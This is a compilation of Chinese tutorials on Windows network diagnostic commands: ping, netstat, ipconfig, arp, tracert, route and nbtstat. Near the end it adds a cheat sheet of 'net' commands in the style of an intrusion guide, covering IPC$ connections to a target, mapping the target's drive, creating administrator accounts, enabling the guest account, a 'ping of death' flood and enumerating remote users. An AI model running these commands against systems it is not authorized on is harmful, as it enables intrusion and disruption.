　　按照缺省設置，Windows上運行的Ping命令發送4個ICMP（網間控制報文協議）回送請求，每個32字節數據，如果一切正常，我們應能得到4個回送應答。 Ping能夠以毫秒為單位顯示發送回送請求到返回回送應答之間的時間量。如果應答時間短，表示數據報不必通過太多的路由器或網絡連接速度比較快。Ping還能顯示TTL（Time To Live存在時間）值，我們可以通過TTL值推算一下數據包已經通過了多少個路由器：源地點TTL起始值（就是比返回TTL略大的一個2的乘方數）-返回時TTL值。例如，返回TTL值為119，那么可以推算數據報離開源地址的TTL起始值為128，而源地點到目標地點要通過9個路由器網段（128-119）；如果返回TTL值為246，TTL起始值就是256，源地點到目標地點要通過9個路由器網段。 

　　1、通過Ping檢測網絡故障的典型次序 

　　正常情況下，當我們使用Ping命令來查找問題所在或檢驗網絡運行情況時，我們需要使用許多Ping命令，如果所有都運行正確，我們就可以相信基本的連通性和配置參數沒有問題；如果某些Ping命令出現運行故障，它也可以指明到何處去查找問題。下面就給出一個典型的檢測次序及對應的可能故障： 

　　ping 127.0.0.1 
　　這個Ping命令被送到本地計算機的IP軟件，該命令永不退出該計算機。如果沒有做到這一點，就表示TCP/IP的安裝或運行存在某些最基本的問題。 

　　ping 本機IP 
　　這個命令被送到我們計算機所配置的IP地址，我們的計算機始終都應該對該Ping命令作出應答，如果沒有，則表示本地配置或安裝存在問題。出現此問題時，局域網用戶請斷開網絡電纜，然后重新發送該命令。如果網線斷開后本命令正確，則表示另一台計算機可能配置了相同的IP地址。 

　　ping 局域網內其他IP 
　　這個命令應該離開我們的計算機，經過網卡及網絡電纜到達其他計算機，再返回。收到回送應答表明本地網絡中的網卡和載體運行正確。但如果收到0個回送應答，那么表示子網掩碼（進行子網分割時，將IP地址的網絡部分與主機部分分開的代碼）不正確或網卡配置錯誤或電纜系統有問題。 

　　ping 網關IP 
　　這個命令如果應答正確，表示局域網中的網關路由器正在運行並能夠作出應答。 

　　ping 遠程IP 
　　如果收到4個應答，表示成功的使用了缺省網關。對於撥號上網用戶則表示能夠成功的訪問Internet（但不排除ISP的DNS會有問題）。 

　　ping localhost 
　　localhost是個作系統的網絡保留名，它是127.0.0.1的別名，每太計算機都應該能夠將該名字轉換成該地址。如果沒有做到這一帶內，則表示主機文件（/Windows/host）中存在問題。 

　　ping www.xxx.com（如www.yesky.com 天極網） 
　　對這個域名執行Ping www.xxx.com 地址，通常是通過DNS 服務器 如果這里出現故障，則表示DNS服務器的IP地址配置不正確或DNS服務器有故障（對於撥號上網用戶，某些ISP已經不需要設置DNS服務器了）。順便說一句：我們也可以利用該命令實現域名對IP地址的轉換功能。 

　　如果上面所列出的所有Ping命令都能正常運行，那么我們對自己的計算機進行本地和遠程通信的功能基本上就可以放心了。但是，這些命令的成功並不表示我們所有的網絡配置都沒有問題，例如，某些子網掩碼錯誤就可能無法用這些方法檢測到。 

　　2、Ping命令的常用參數選項 

　　ping IP –t 
　　連續對IP地址執行Ping命令，直到被用戶以Ctrl+C中斷。 

　　ping IP -l 3000 
　　指定Ping命令中的數據長度為3000字節，而不是缺省的32字節。 

　　ping IP –n 
　　執行特定次數的Ping命令。 

二、Netstat 命令的使用技巧 

　　Netstat用於顯示與IP、TCP、UDP和ICMP協議相關的統計數據，一般用於檢驗本機各端口的網絡連接情況。 

　　如果我們的計算機有時候接受到的數據報會導致出錯數據刪除或故障，我們不必感到奇怪，TCP/IP可以容許這些類型的錯誤，並能夠自動重發數據報。但如果累計的出錯情況數目占到所接收的IP數據報相當大的百分比，或者它的數目正迅速增加，那么我們就應該使用Netstat查一查為什么會出現這些情況了。 

　　1、netstat 的一些常用選項 

　　netstat –s 

　　本選項能夠按照各個協議分別顯示其統計數據。如果我們的應用程序（如Web瀏覽器）運行速度比較慢，或者不能顯示Web頁之類的數據，那么我們就可以用本選項來查看一下所顯示的信息。我們需要仔細查看統計數據的各行，找到出錯的關鍵字，進而確定問題所在。 

　　netstat –e 

　　本選項用於顯示關於以太網的統計數據。它列出的項目包括傳送的數據報的總字節數、錯誤數、刪除數、數據報的數量和廣播的數量。這些統計數據既有發送的數據報數量，也有接收的數據報數量。這個選項可以用來統計一些基本的網絡流量）。 

　　netstat –r 

　　本選項可以顯示關於路由表的信息，類似於后面所講使用route print命令時看到的 信息。除了顯示有效路由外，還顯示當前有效的連接。 

　　netstat –a 

　　本選項顯示一個所有的有效連接信息列表，包括已建立的連接（ESTABLISHED），也包括監聽連接請求（LISTENING）的那些連接。 

　　netstat –n 

　　顯示所有已建立的有效連接。 

　　下面是 netstat 的輸出示例： 

　　C:\>netstat -e 

　　Interface Statistics 
　　Received　　　Sent 
　　Bytes　　　　　　　　　3995837940　　47224622 
　　Unicast packets　　　　120099　　　　131015 
　　Non-unicast packets　　7579544　　　 3823 
　　Discards　　　　　　　 0　　　　　　 0 
　　Errors　　　　　　　　 0　　　　　　 0 
　　Unknown protocols　　　363054211 

　　C:\>netstat -a 

　　Active Connections 
　　Proto Local Address　　　Foreign Address　　　 State 
　　TCP　CORP1:1572　　　 172.16.48.10:nbsession　 ESTABLISHED 
　　TCP　CORP1:1589　　　 172.16.48.10:nbsession　 ESTABLISHED 
　　UDP　CORP1:1025　　　 *:* 
　　UDP　CORP1:snmp　　　 *:* 
　　UDP　CORP1:nbname　　 *:* 

　　C:\>netstat -s 

　　IP Statistics 
　　Packets Received　　　　　　 = 5378528 
　　Received Header Errors　　　 = 738854 
　　Received Address Errors　　　= 23150 
　　Datagrams Forwarded　　　　　= 0 
　　Unknown Protocols Received　 = 0 
　　Received Packets Discarded　 = 0 
　　Received Packets Delivered　 = 4616524 
　　Output Requests　　　　　　　= 132702 
　　Routing Discards　　　　　　 = 157 

　　2、Netstat的妙用 

　　經常上網的人一般都使用ICQ的，不知道我們有沒有被一些討厭的人騷擾，想投訴卻又不知從和下手？其實，我們只要知道對方的IP，就可以向他所屬的ISP投訴了。但怎樣才能通過ICQ知道對方的IP呢？如果對方在設置ICQ時選擇了不顯示IP地址，那我們是無法在信息欄中看到的。其實，我們只需要通過Netstat就可以很方便的做到這一點：當他通過ICQ或其他的工具與我們相連時（例如我們給他發一條ICQ信息或他給我們發一條信息），我們立刻在DOS 命令提示符下輸入netstat -n或netstat -a就可以看到對方上網時所用的IP或ISP域名了，甚至連所用Port都完全暴露了。 

三、IPConfig命令的使用技巧 

　　IPConfig實用程序和它的等價圖形用戶界面----Windows 95/98中的WinIPCfg可用於顯示當前的TCP/IP配置的設置值。這些信息一般用來檢驗人工配置的TCP/IP設置是否正確。 
但是，如果我們的計算機和所在的局域網使用了動態主機配置協議（DHCP），這個程序所顯示的信息也許更加實用。這時，IPConfig可以讓我們了解自己的計算機是否成功的租用到一個IP地址，如果租用到則可以了解它目前分配到的是什么地址。了解計算機當前的IP地址、子網掩碼和缺省網關實際上是進行測試和故障分析的必要項目。 

　　1、IPConfig最常用的選項 

　　ipconfig 

　　當使用IPConfig時不帶任何參數選項，那么它為每個已經配置了的接口顯示IP地址、子網掩碼和缺省網關值。 

　　ipconfig /all 

　　當使用all選項時，IPConfig能為DNS和WINS服務器顯示它已配置且所要使用的附加信息（如IP地址等），並且顯示內置於本地網卡中的物理地址（MAC）。如果IP地址是從DHCP服務器租用的，IPConfig將顯示DHCP服務器的IP地址和租用地址預計失效的日期。 

　　ipconfig /release和ipconfig /renew 

　　這是兩個附加選項，只能在向DHCP服務器租用其IP地址的計算機上起作用。如果我們輸入ipconfig /release，那么所有接口的租用IP地址便重新交付給DHCP服務器（歸還IP地址）。如果我們輸入ipconfig /renew，那么本地計算機便設法與DHCP服務器取得聯系，並租用一個IP地址。請注意，大多數情況下網卡將被重新賦予和以前所賦予的相同的IP地址。 

　　下面的范例是 ipconfig /all 命令輸出，該計算機配置成使用 DHCP 服務器動態配置 TCP/IP，並使用 WINS 和 DNS 服務器解析名稱。 

　　Windows 2000 IP Configuration 

　　Node Type.. . . . . . . . : Hybrid 

　　IP Routing Enabled.. . . . : No 

　　WINS Proxy Enabled.. . . . : No 

　　Ethernet adapter Local Area Connection: 

　　Host Name.. . . . . . . . : corp1.microsoft.com 

　　DNS Servers . . . . . . . : 10.1.0.200 

　　Description. . . . . . . : 3Com 3C90x Ethernet Adapter 

　　Physical Address. . . . . : 00-60-08-3E-46-07 

　　DHCP Enabled.. . . . . . . : Yes 

　　Autoconfiguration Enabled.: Yes 

　　IP Address. . . . . . . . . : 192.168.0.112 

　　Subnet Mask. . . . . . . . : 255.255.0.0 

　　Default Gateway. . . . . . : 192.168.0.1 

　　DHCP Server. . . . . . . . : 10.1.0.50 

　　Primary WINS Server. . . . : 10.1.0.101 

　　Secondary WINS Server. . . : 10.1.0.102 

　　Lease Obtained.. . . . . . : Wednesday, September 02, 1998 10:32:13 AM 

　　Lease Expires.. . . . . . : Friday, September 18, 1998 10:32:13 AM 

　　如果我們使用的是Windows 95/98，那么我們應該更習慣使用winipcfg而不是ipconfig，因為它是一個圖形用戶界面，而且所顯示的信息與ipconfig相同，並且也提供發布和更新動態IP地址的選項。 

四、ARP（地址轉換協議）的使用技巧 

　　ARP是一個重要的TCP/IP協議，並且用於確定對應IP地址的網卡物理地址。實用arp命令，我們能夠查看本地計算機或另一台計算機的ARP高速緩存中的當前內容。此外，使用arp命令，也可以用人工方式輸入靜態的網卡物理/IP地址對，我們可能會使用這種方式為缺省網關和本地服務器等常用主機進行這項作，有助於減少網絡上的信息量。 

　　按照缺省設置，ARP高速緩存中的項目是動態的，每當發送一個指定地點的數據報且高速緩存中不存在當前項目時，ARP便會自動添加該項目。一旦高速緩存的項目被輸入，它們就已經開始走向失效狀態。例如，在Windows NT/2000網絡中，如果輸入項目后不進一步使用，物理/IP地址對就會在2至10分鍾內失效。因此，如果ARP高速緩存中項目很少或根本沒有時，請不要奇怪，通過另一台計算機或路由器的ping命令即可添加。所以，需要通過arp命令查看高速緩存中的內容時，請最好先ping 此台計算機（不能是本機發送ping命令）。 

　　ARP常用命令選項： 

　　arp -a或arp –g 

　　用於查看高速緩存中的所有項目。-a和-g參數的結果是一樣的，多年來-g一直是UNIX平台上用來顯示ARP高速緩存中所有項目的選項，而Windows用的是arp -a（-a可被視為all，即全部的意思），但它也可以接受比較傳統的-g選項。 

　　arp -a IP 

　　如果我們有多個網卡，那么使用arp -a加上接口的IP地址，就可以只顯示與該接口相關的ARP緩存項目。 

　　arp -s IP 物理地址 

　　我們可以向ARP高速緩存中人工輸入一個靜態項目。該項目在計算機引導過程中將保持有效狀態，或者在出現錯誤時，人工配置的物理地址將自動更新該項目。 

　　arp -d IP 

　　使用本命令能夠人工刪除一個靜態項目。 

　　例如我們在命令提示符下，鍵入 Arp –a；如果我們使用過 Ping 命令測試並驗證從這台計算機到 IP 地址為 10.0.0.99 的主機的連通性，則 ARP 緩存顯示以下項： 

　　Interface:10.0.0.1 on interface 0x1 

　　Internet Address　　　Physical Address　　　Type 

　　10.0.0.99　　　　　　 00-e0-98-00-7c-dc　　 dynamic 

　　在此例中，緩存項指出位於 10.0.0.99 的遠程主機解析成 00-e0-98-00-7c-dc 的媒體訪問控制地址，它是在遠程計算機的網卡硬件中分配的。媒體訪問控制地址是計算機用於與網絡上遠程 TCP/IP 主機物理通訊的地址。 

　　至此我們可以用ipconfig和ping命令來查看自己的網絡配置並判斷是否正確、可以用netstat查看別人與我們所建立的連接並找出ICQ使用者所隱藏的IP信息、可以用arp查看網卡的MAC地址。 

　五、Tracert、Route 與 NBTStat的使用技巧 

　　1、Tracert的使用技巧　　 

　　如果有網絡連通性問題，可以使用 tracert 命令來檢查到達的目標 IP 地址的路徑並記錄結果。tracert 命令顯示用於將數據包從計算機傳遞到目標位置的一組 IP 路由器，以及每個躍點所需的時間。如果數據包不能傳遞到目標，tracert 命令將顯示成功轉發數據包的最后一個路由器。當數據報從我們的計算機經過多個網關傳送到目的地時，Tracert命令可以用來跟蹤數據報使用的路由（路徑）。該實用程序跟蹤的路徑是源計算機到目的地的一條路徑，不能保證或認為數據報總遵循這個路徑。如果我們的配置使用DNS，那么我們常常會從所產生的應答中得到城市、地址和常見通信公司的名字。Tracert是一個運行得比較慢的命令（如果我們指定的目標地址比較遠），每個路由器我們大約需要給它15秒鍾。 

　　Tracert的使用很簡單，只需要在tracert后面跟一個IP地址或URL，Tracert會進行相應的域名轉換的。 

　　tracert 最常見的用法： 

　　tracert IP address [-d] 該命令返回到達 IP 地址所經過的路由器列表。通過使用 -d 選項，將更快地顯示路由器路徑，因為 tracert 不會嘗試解析路徑中路由器的名稱。 

　　Tracert一般用來檢測故障的位置，我們可以用tracert IP在哪個環節上出了問題，雖然還是沒有確定是什么問題，但它已經告訴了我們問題所在的地方，我們也就可以很有把握的告訴別人----某某地方出了問題。 

　　2、Route 的使用技巧 

　　大多數主機一般都是駐留在只連接一台路由器的網段上。由於只有一台路由器，因此不存在使用哪一台路由器將數據報發表到遠程計算機上去的問題，該路由器的IP地址可作為該網段上所有計算機的缺省網關來輸入。 

　　但是，當網絡上擁有兩個或多個路由器時，我們就不一定想只依賴缺省網關了。實際上我們可能想讓我們的某些遠程IP地址通過某個特定的路由器來傳遞，而其他的遠程IP則通過另一個路由器來傳遞。 

　　在這種情況下，我們需要相應的路由信息，這些信息儲存在路由表中，每個主機和每個路由器都配有自己獨一無二的路由表。大多數路由器使用專門的路由協議來交換和動態更新路由器之間的路由表。但在有些情況下，必須人工將項目添加到路由器和主機上的路由表中。Route就是用來顯示、人工添加和修改路由表項目的。 

　　一般使用選項： 

　　route print 

　　本命令用於顯示路由表中的當前項目，在單路由器網段上的輸出；由於用IP地址配置了網卡，因此所有的這些項目都是自動添加的。 

　　route add 

　　使用本命令，可以將信路由項目添加給路由表。例如，如果要設定一個到目的網絡209.98.32.33的路由，其間要經過5個路由器網段，首先要經過本地網絡上的一個路由器，器IP為202.96.123.5，子網掩碼為255.255.255.224，那么我們應該輸入以下命令： 

　　route add 209.98.32.33 mask 255.255.255.224 202.96.123.5 metric 5 

　　route change 

　　我們可以使用本命令來修改數據的傳輸路由，不過，我們不能使用本命令來改變數據的目的地。下面這個例子可以將數據的路由改到另一個路由器，它采用一條包含3個網段的更直的路徑： 

　　route add 209.98.32.33 mask 255.255.255.224 202.96.123.250 metric 3 

　　route delete 

　　使用本命令可以從路由表中刪除路由。例如：route delete 209.98.32.33 

　　3、NBTStat的使用技巧 

　　使用 nbtstat 命令釋放和刷新 NetBIOS 名稱。NBTStat（TCP/IP上的NetBIOS統計數據）實用程序用於提供關於關於NetBIOS的統計數據。運用NetBIOS，我們可以查看本地計算機或遠程計算機上的NetBIOS名字表格。 

　　常用選項： 

　　nbtstat –n 

　　顯示寄存在本地的名字和服務程序。 

　　nbtstat –c 

　　本命令用於顯示NetBIOS名字高速緩存的內容。NetBIOS名字高速緩存用於寸放與本計算機最近進行通信的其他計算機的NetBIOS名字和IP地址對。 

　　nbtstat –r 

　　本命令用於清除和重新加載NetBIOS名字高速緩存。 

　　nbtstat -a IP 

　　通過IP顯示另一台計算機的物理地址和名字列表，我們所顯示的內容就像對方計算機自己運行nbtstat -n一樣。 

　　nbtstat -s IP 

　　顯示實用其IP地址的另一台計算機的NetBIOS連接表。 

　　例如我們在命令提示符下，鍵入：nbtstat –RR 釋放和刷新過程的進度以命令行輸出的形式顯示。
該信息表明當前注冊在該計算機的 WINS 中的所有本地 NetBIOS 名稱是否已經使用 WINS 服務器釋放和續訂了注冊。




常用網絡命令（windows）

    Ping命令的常用參數選項

　　·ping IP –t 　　連續對IP地址執行Ping命令，直到被用戶以Ctrl+C中斷。

　　·ping IP -l 3000 　　指定Ping命令中的數據長度為3000字節，而不是缺省的32字節。

　　·ping IP –n 　　執行特定次數的Ping命令。

     netstat 的一些常用選項

　　·netstat –s 　　本選項能夠按照各個協議分別顯示其統計數據。如果我們的應用程序（如Web瀏覽器）運行速度比較慢，或者不能顯示Web頁之類的數據，那么我們就可以用本選項來查看一下所顯示的信息。我們需要仔細查看統計數據的各行，找到出錯的關鍵字，進而確定問題所在。

　　·netstat –e 　　本選項用於顯示關於以太網的統計數據。它列出的項目包括傳送的數據報的總字節數、錯誤數、刪除數、數據報的數量和廣播的數量。這些統計數據既有發送的數據報數量，也有接收的數據報數量。這個選項可以用來統計一些基本的網絡流量）。

　　·netstat –r 　　本選項可以顯示關於路由表的信息，類似於后面所講使用route print命令時看到的 信息。除了顯示有效路由外，還顯示當前有效的連接。

　　·netstat –a 　　本選項顯示一個所有的有效連接信息列表，包括已建立的連接（ESTABLISHED），也包括監聽連接請求（LISTENING）的那些連接。

　　·netstat –n 　　顯示所有已建立的有效連接。

IPConfig最常用的選項

　　·ipconfig 　　當使用IPConfig時不帶任何參數選項，那么它為每個已經配置了的接口顯示IP地址、子網掩碼和缺省網關值。

　　·ipconfig /all 　　當使用all選項時，IPConfig能為DNS和WINS服務器顯示它已配置且所要使用的附加信息（如IP地址等），並且顯示內置於本地網卡中的物理地址（MAC）。如果IP地址是從DHCP服務器租用的，IPConfig將顯示DHCP服務器的IP地址和租用地址預計失效的日期。

　　·ipconfig /release和ipconfig /renew 　　這是兩個附加選項，只能在向DHCP服務器租用其IP地址的計算機上起作用。如果我們輸入ipconfig /release，那么所有接口的租用IP地址便重新交付給DHCP服務器（歸還IP地址）。如果我們輸入ipconfig /renew，那么本地計算機便設法與DHCP服務器取得聯系，並租用一個IP地址。請注意，大多數情況下網卡將被重新賦予和以前所賦予的相同的IP地址。 

ARP常用命令選項：

　　·arp -a或arp –g 　　用於查看高速緩存中的所有項目。-a和-g參數的結果是一樣的，多年來-g一直是UNIX平台上用來顯示ARP高速緩存中所有項目的選項，而Windows用的是arp -a（-a可被視為all，即全部的意思），但它也可以接受比較傳統的-g選項。

　　·arp -a IP 　　如果我們有多個網卡，那么使用arp -a加上接口的IP地址，就可以只顯示與該接口相關的ARP緩存項目。

　　·arp -s IP 物理地址 　　我們可以向ARP高速緩存中人工輸入一個靜態項目。該項目在計算機引導過程中將保持有效狀態，或者在出現錯誤時，人工配置的物理地址將自動更新該項目。

　　·arp -d IP 　　使用本命令能夠人工刪除一個靜態項目。

　　例如我們在命令提示符下，鍵入 Arp –a；如果我們使用過 Ping 命令測試並驗證從這台計算機到 IP 地址為 10.0.0.99 的主機的連通性，則 ARP 緩存顯示以下項：

　　Interface:10.0.0.1 on interface 0x1 　　Internet Address　　　Physical Address　　　Type 　　10.0.0.99　　　　　　 00-e0-98-00-7c-dc　　 dynamic

　　在此例中，緩存項指出位於 10.0.0.99 的遠程主機解析成 00-e0-98-00-7c-dc 的媒體訪問控制地址，它是在遠程計算機的網卡硬件中分配的。媒體訪問控制地址是計算機用於與網絡上遠程 TCP/IP 主機物理通訊的地址。

Route 的使用技巧

　　大多數主機一般都是駐留在只連接一台路由器的網段上。由於只有一台路由器，因此不存在使用哪一台路由器將數據報發表到遠程計算機上去的問題，該路由器的IP地址可作為該網段上所有計算機的缺省網關來輸入。

　　但是，當網絡上擁有兩個或多個路由器時，我們就不一定想只依賴缺省網關了。實際上我們可能想讓我們的某些遠程IP地址通過某個特定的路由器來傳遞，而其他的遠程IP則通過另一個路由器來傳遞。

　　在這種情況下，我們需要相應的路由信息，這些信息儲存在路由表中，每個主機和每個路由器都配有自己獨一無二的路由表。大多數路由器使用專門的路由協議來交換和動態更新路由器之間的路由表。但在有些情況下，必須人工將項目添加到路由器和主機上的路由表中。Route就是用來顯示、人工添加和修改路由表項目的。

　　一般使用選項：

　　·route print 　　本命令用於顯示路由表中的當前項目，在單路由器網段上的輸出；由於用IP地址配置了網卡，因此所有的這些項目都是自動添加的。

　　·route add 　　使用本命令，可以將信路由項目添加給路由表。例如，如果要設定一個到目的網絡209.98.32.33的路由，其間要經過5個路由器網段，首先要經過本地網絡上的一個路由器，器IP為202.96.123.5，子網掩碼為255.255.255.224，那么我們應該輸入以下命令：

　　route add 209.98.32.33 mask 255.255.255.224 202.96.123.5 metric 5

　　·route change 　　我們可以使用本命令來修改數據的傳輸路由，不過，我們不能使用本命令來改變數據的目的地。下面這個例子可以將數據的路由改到另一個路由器，它采用一條包含3個網段的更直的路徑：

　　route add 209.98.32.33 mask 255.255.255.224 202.96.123.250 metric 3

　　·route delete 　　使用本命令可以從路由表中刪除路由。例如：route delete 209.98.32.33

tracert 最常見的用法：
　　tracert IP address [-d] 該命令返回到達 IP 地址所經過的路由器列表。通過使用 -d 選項，將更快地顯示路由器路徑，因為 tracert 不會嘗試解析路徑中路由器的名稱。

域名反向解析查看命令

nslookup –qt=ptr yourIP

 

 

 

Windows最常用的幾個網絡CMD命令總結

 

一、ping

　　主要是測試本機TCP/IP協議配置正確性與當前網絡現狀.  

　　ping命令的基本使用格式是：  ping  IP地址/主機名/域名 [-t] [-a] [-n count] [-l size]

-t：連續對IP地址/主機名/域名執行Ping命令，直到被用戶以Ctrl+C中斷.

-a：以IP地址格式顯示目標主機網絡地址，默認選項.

-n count：指定要Ping多少次，具體次數由count來指定，默認值為4.

-l size：指定Ping命令中發送的數據長度，默認值是32字節.

 

二、netstat

　　主要是幫助了解整體網絡情況以及當前連接情況.

　　基本使用命令格式：netstat [-n] [-a] [-e] [-r][-s]

-n：顯示所有已建立的有效連接.

-s：本選項能夠按照各個協議分別顯示其統計數據。如果應用程序（如Web瀏覽器）運行速度比較慢，或者不能顯示Web頁之類的數據，那么我們就可以用本選項來查看一下所顯示的信息.我們需要仔細查看統計數據的各行，找到出錯的關鍵字，進而確定問題所在.

-e：本選項用於顯示關於以太網的統計數據。它列出的項目包括傳送的數據報的總字節數、錯誤數、刪除數、數據報的數量和廣播的數量。這些統計數據既有發送的數據報數量，也有接收的數據報數量.（這個選項可以用來統計一些基本的網絡流量）        

-r：本選項可以顯示關於路由表的信息，除了顯示有效路由外，還顯示當前有效的連接.

-a：本選項顯示一個所有的有效連接信息列表，包括已建立的連接（ESTABLISHED），也包括監聽連接請求（LISTENING）的那些連接.

 

三、ipconfig

　　主要是了解當前TCP/IP協議所設置的值，如IP地址、子網掩碼、缺省網關、Mac地址等.

　　基本使用方法：ipconfig [/all/release/renew]

ipconfig：當不帶任何參數選項，那么它為每個已經配置了的接口顯示IP地址、子網掩碼和缺省網關值.

/all：當使用all選項時，能為DNS和WINS服務器顯示它已配置且所要使用的附加信息（如IP地址等），並且顯示內置於本地網卡中的物理地址（MAC）.如果IP地址是從DHCP服務器租用的，它會顯示DHCP服務器的IP地址和租用地址預計失效的日期.

/release & /renew ：這是兩個附加選項，只能在向DHCP服務器租用其IP地址的計算機上起作用.如果我輸入ipconfig/release，那么所有接口的租用IP地址便重新交付給DHCP服務器（歸還IP地址）.如果輸入ipconfig /renew，那么本地計算機便設法與DHCP服務器取得聯系，並租用一個IP地址.請注意，大多數情況下網卡將被重新賦予和以前所賦予的相同的IP地址.

 

四、route

　　主要用於配置路由與查看當前路由情況.

　　基本使用方法：route [print] [add] [change] [delete]

print：主要是打印當前路由情況.

add：手動添加路由或配路由，例子如下：

?

route ADD 157.0.0.0 MASK 255.0.0.0  157.55.80.1 METRIC 3 IF 2

 

   destination^ （目標地址）  ^mask      ^gateway   metric^    ^

 

                                                    Interface^ (接口)

change：只用於修改網關和/或躍點數.例子如下：

?

route CHANGE 157.0.0.0 MASK 255.0.0.0 157.55.80.5 METRIC 2 IF 2

delete：刪除路由.例子如下：

?

route DELETE 157.0.0.0

 

五、tracert(trace router的縮寫，為路由跟蹤命令)

　　主要用於顯示將數據包從計算機傳遞到目標位置的一組IP路由器，以及每個躍點所需的時間(即跟蹤數據報傳送路徑),測試網絡連通性問題.

 

基本用法: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout]               

 

　　　　　　　　　[-R] [-S srcaddr] [-4] [-6] target_name(目標IP、URL或域名)

 

選項:

 

     -d                 不將地址解析成主機名.

 

     -h maximum_hops    搜索目標的最大躍點數.

 

     -j host-list       與主機列表一起的松散源路由(僅適用於 IPv4).

 

     -w timeout         等待每個回復的超時時間(以毫秒為單位).

 

     -R                 跟蹤往返行程路徑(僅適用於 IPv6).

 

     -S srcaddr         要使用的源地址(僅適用於 IPv6).

 

     -4                 強制使用 IPv4.

 

     -6                 強制使用 IPv6.

 

六、ARP(Address Resolution Protocol，地址解析協議，是獲取物理地址的一個TCP/IP協議.)

　　主要用來查看本地計算機或另一台計算機的ARP高速緩存中的當前內容.

　　基本使用方法：arp [-a/g] [-s] [-d]

-a：用於查看高速緩存中的所有項目,-a和-g參數的結果是一樣的.

-s：向ARP高速緩存中人工輸入一個靜態ARP項目.

-d：刪除ARP高速緩存中的內容.

 

 

 

結果分析

1，ipconfig顯示本機ip地址配置情況。

2，ipconfig/all顯示本機IP地址配置等情況的詳細信息。

3，ping指令測試網絡的連通性，發送4個ICMP的類型8報文給對方，對方回應4個ICMP類型的報文給本機。

4，ping –t不停發送ICPM的類型8報文給對方，只要對方存活，就會一直發。

5，arp –a顯示本機arp緩存的內容，對方IP地址和對方MAC地址的對應關系。

6，arp –d刪除本機的arp緩存區，清除IP地址與MAC地址的對應關系。

7，arp –s綁定本機中的arp緩存中的ip地址與mac地址的對應關系為靜態關系。

8，neststat –an顯示本機的網絡連接情況。

9，nslookup 用於域名解析的指令，可以解析出域名所對應的ip地址。

10，            tracert : trace route的縮寫，表示路由跟蹤。

 

 

 

 

Dos命令下多文件中查找某字符串

findstr /s/i "WndProc" *.*

在DOS下進行，“WndProc”為要查找的字符串。查找當前目錄ixia的*.*文件。 批處理文件可以寫成如下形式：

@echo off

for %%i in (C:\Users\Administrator\Desktop\New\CyUSB\*.*) do (type %%i |findstr "WndProc">nul && echo %%~nxi)

pause

 

文件內容比較

利用FC命令就可以進行比較。FC命令是DOS下的一個常用命令，在Windows中同樣適用。你將兩份記事本文件保存在同一文件夾中，例如 D:\TXT，並分別命名為1.txt、2.txt；然后在運行中輸入Cmd打開命令提示符窗口，並用CD命令進入D:\TXT，最后輸入Fc 1.txt 2.txt回車后就可以看到兩者之間的不同了。

人總要去積累生活、工作上的點點滴滴，慢慢的進步，以后回頭看看，笑笑，順便學學，人都說回憶才是最美的。

 

 

 

 

運用命令玩轉Windows 


近來做項目實施，發現自己對常用的命令不熟悉，給工作帶來了一定的麻煩，尤其是你的項目給用戶提供的是解決方案，而不是簡單對setup的軟件。
dxdiag      查看當前電腦的硬件配置
nbstat -a IP 查看網絡是否暢通
hostname  獲取主機
nslookup IP
 tracert  IP
 ipconfig /all
 ipconfig /release
 ipconfig /renew
 ipconfig /flushdns
 ipconfig /displaydns
 helo 域名
mail from:發件人
rcpt to：收件人
 遠程桌面的快捷方式屬性中添加參數/console后，只能有一個用戶連接到服務器上。
inetmgr打開的是IIS的管理界面
iisreset重啟本機的IIS服務.

 

 

 

net use ipipc$ " " /user:" "　　 　　　　　　//建立IPC空鏈接 
net use ipipc$ "密碼" /user:"用戶名" 　　　　//建立IPC非空鏈接 
net use h: ipc$ "密碼" /user:"用戶名"　　　　//直接登陸后映射對方C：到本地為H: 
net use h: ipc$　　　　 //登陸后映射對方C：到本地為H: 
net use ipipc$ /del 　　　　//刪除IPC鏈接 
net use h: /del 　　　　//刪除映射對方到本地的為H:的映射 
net user 用戶名　密碼　/add 　　　　//建立用戶 
net user guest /active:yes 　　　　//激活guest用戶 
net user 　　　　//查看有哪些用戶 
net user 　　　　//帳戶名 查看帳戶的屬性 
net localgroup administrators 用戶名 /add 　　　　//把“用戶”添加到管理員中使其具有管理員權限,注意：administrator后加s用復數 
net start 　　　　//查看開啟了哪些服務 
net start 服務名　 　　　　//開啟服務；(如:net start telnet， net start schedule) 
net stop 服務名 　　　　//停止某服務 
net time 目標ip 　　　　//查看對方時間 
net time 目標ip /set 　　　　//設置本地計算機時間與“目標IP”主機的時間同步,加上參數/yes可取消確認信息 
net view 　　　　//查看本地局域網內開啟了哪些共享 
net view ip 　　　　//查看對方局域網內開啟了哪些共享 
net config 　　　　//顯示系統網絡設置 
net logoff 　　　　//斷開連接的共享 
net pause 　　　　//服務名 暫停某服務 
net send ip 　　　　//"文本信息" 向對方發信息 
net ver 　　　　//局域網內正在使用的網絡連接類型和信息 
net share 　　　　//查看本地開啟的共享 
net share ipc$ 　　　　//開啟ipc$共享 
net share ipc$ /del 　　　　//刪除ipc$共享 
net share c$ /del 　　　　//刪除C：共享 
net user guest 12345 　　　　//用guest用戶登陸后用將密碼改為12345 
net password 密碼 　　　　//更改系統登陸密碼 
netstat -a 查看開啟了哪些端口,常用netstat -an 
netstat -n 查看端口的網絡連接情況，常用netstat -an 
netstat -v 查看正在進行的工作 
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況） 
netstat -s 查看正在使用的所有協議使用情況 
nbtstat -A ip 對方136到139其中一個端口開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫 
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：“-w數字”用於設置超時間隔。 
ping ip(或域名) 向對方主機發送默認大小為32字節的數據，參數：“-l[空格]數據包大小”；“-n發送數據次數”；“-t”指一直ping。 
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping) 
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數“/all”顯示全部配置信息 
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內) 
kill -F 進程名 加-F參數后強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內) 
